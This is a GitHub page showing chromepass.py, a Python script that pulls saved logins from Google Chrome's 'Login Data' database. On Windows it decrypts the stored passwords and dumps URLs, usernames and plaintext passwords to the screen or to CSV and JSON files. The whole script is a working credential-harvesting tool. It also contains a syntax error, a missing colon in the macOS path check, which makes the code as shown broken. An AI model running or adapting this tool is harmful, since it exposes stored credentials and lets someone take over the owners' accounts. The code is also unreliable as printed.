This repository has been archived by the owner on Jun 11, 2019. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 102
/
chromepass.py
128 lines (102 loc) · 3.54 KB
/
chromepass.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import sqlite3
import csv
import json
import argparse
try:
import win32crypt
except:
pass
def args_parser():
parser = argparse.ArgumentParser(
description="Retrieve Google Chrome Passwords")
parser.add_argument("-o", "--output", choices=['csv', 'json'],
help="Output passwords to [ CSV | JSON ] format.")
parser.add_argument(
"-d", "--dump", help="Dump passwords to stdout. ", action="store_true")
args = parser.parse_args()
if args.dump:
for data in main():
print(data)
if args.output == 'csv':
output_csv(main())
return
if args.output == 'json':
output_json(main())
return
else:
parser.print_help()
def main():
info_list = []
path = getpath()
try:
connection = sqlite3.connect(path + "Login Data")
with connection:
cursor = connection.cursor()
v = cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
value = v.fetchall()
if (os.name == "posix") and (sys.platform == "darwin"):
print("Mac OSX not supported.")
sys.exit(0)
for origin_url, username, password in value:
if os.name == 'nt':
password = win32crypt.CryptUnprotectData(
password, None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': origin_url,
'username': username,
'password': str(password)
})
except sqlite3.OperationalError as e:
e = str(e)
if (e == 'database is locked'):
print('[!] Make sure Google Chrome is not running in the background')
elif (e == 'no such table: logins'):
print('[!] Something wrong with the database name')
elif (e == 'unable to open database file'):
print('[!] Something wrong with the database path')
else:
print(e)
sys.exit(0)
return info_list
def getpath():
if os.name == "nt":
# This is the Windows Path
PathName = os.getenv('localappdata') + \
'\\Google\\Chrome\\User Data\\Default\\'
elif os.name == "posix":
PathName = os.getenv('HOME')
if sys.platform == "darwin"
# This is the OS X Path
PathName += '/Library/Application Support/Google/Chrome/Default/'
else:
# This is the Linux Path
PathName += '/.config/google-chrome/Default/'
if not os.path.isdir(PathName):
print('[!] Chrome Doesn\'t exists')
sys.exit(0)
return PathName
def output_csv(info):
try:
with open('chromepass-passwords.csv', 'wb') as csv_file:
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data[
'username'], data['password'])).encode('utf-8'))
print("Data written to chromepass-passwords.csv")
except EnvironmentError:
print('EnvironmentError: cannot write data')
def output_json(info):
try:
with open('chromepass-passwords.json', 'w') as json_file:
json.dump({'password_items':info},json_file)
print("Data written to chromepass-passwords.json")
except EnvironmentError:
print('EnvironmentError: cannot write data')
if __name__ == '__main__':
args_parser()